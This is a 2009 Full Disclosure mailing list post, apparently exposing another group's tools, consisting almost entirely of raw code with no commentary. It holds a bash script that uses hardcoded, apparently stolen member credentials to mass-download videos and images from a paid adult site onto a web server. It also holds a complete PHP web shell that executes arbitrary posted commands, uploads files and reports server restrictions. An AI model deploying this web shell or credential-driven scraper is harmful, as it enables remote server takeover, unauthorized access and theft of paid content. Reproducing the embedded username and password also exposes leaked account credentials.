Full Disclosure mailing list archives
prezzie from rx2s.org and lamers
From: Kristo pher <kristo57 () mail ru>
Date: Fri, 06 Mar 2009 07:21:51 +0300
http://rx2s.org/remote/test/XCORECLUB_RIP/ #!/bin/bash export PATH=/usr/bin:/bin for x in {1..28} ; do LINKS=http\:\/\/members\.xcoreclub\.com/scenes\.php\?website\=all\&page\=$x for VIDEOS in {1..4} ; do NAME=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/scenes.php?website=all&page=$LINKS"; \ | egrep -o 'class="model-name">[^<]+' | cut -d\> -f2 | head -n$VIDEOS | tail -1 ) DATUM=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/scenes.php?website=all&page=$LINKS"; \ | egrep -o 'class="model-desc" align="right"><b>[^<]+' | cut -d\> -f3 | head -n$VIDEOS | cut -d" " -f3 | tail -1 ) LINK=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/scenes.php?website=all&page=$LINKS"; \ | egrep -o 'href="sets/[0-9]+/video.html"' | cut -d\" -f2 | cut -d\" -f1 | head -n$VIDEOS | tail -1 ) VIDEO=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$LINK"; | \ egrep -o 'href="/content/[0-9]+/v002.wmv' | cut -d\" -f2 ) PIC=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$LINK"; | \ egrep -o 'src="/content/[0-9]+/pv000.jpg' | cut -d\" -f2 ) echo $NAME\_$DATUM $LINK $VIDEO $PIC wget -O /mounted-storage/home101c/sub005/sc62783-TAAJ/www/remote/test/XCORECLUB_RIP/$NAME\_$DATUM\.jpg --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$PIC"; wget -O /mounted-storage/home101c/sub005/sc62783-TAAJ/www/remote/test/XCORECLUB_RIP/$NAME\_$DATUM\.wmv --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$VIDEO"; done done -----AND <? if($_POST['dir'] == "") { $curdir = `pwd`; //pwd } else { $curdir = $_POST['dir']; } if($_POST['king'] == "") { $curcmd = "ls -lah"; } else { $curcmd = $_POST['king']; } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd";> <html> <head> <title>Lamerz</title> <style type="text/css"> body { color: white; background-color: black; font-size: 12px; font-family: Helvetica,Arial,Sans-Serif; } </style> </head> <body> $ob = @ini_get("open_basedir"); $df = @ini_get("disable_functions"); if( ini_get('safe_mode') ) { echo "SM: 1 \\ "; } else { echo "SM: 0 \\ "; } if(''==$df) { echo "DF: 0 \\ "; } else { echo "DF: ".$df." \\ "; } echo "".php_uname()."\n"; ?> <hr></pre> <table><form method="post" enctype="multipart/form-data"> <tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td> <tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td> <td><input name="exe" type="submit" value="Execute"></td></tr> <tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td> <td><input name="upl" type="submit" value="Upload"></td></tr> </form></table> <pre><hr> <? if(($_POST['upl']) == "Upload" ) { if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) { echo "The file has been uploaded<br><br>"; } else { echo "There was an error uploading the file, please try again!"; } } if(($_POST['exe']) == "Execute") { $curcmd = "cd ".$curdir.";".$curcmd; $f=popen($curcmd,"r"); while (!feof($f)) { $buffer = fgets($f, 4096); $string .= $buffer; } pclose($f); echo htmlspecialchars($string); } ?> </pre> </body> </html> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- prezzie from rx2s.org and lamers Kristo pher (Mar 05)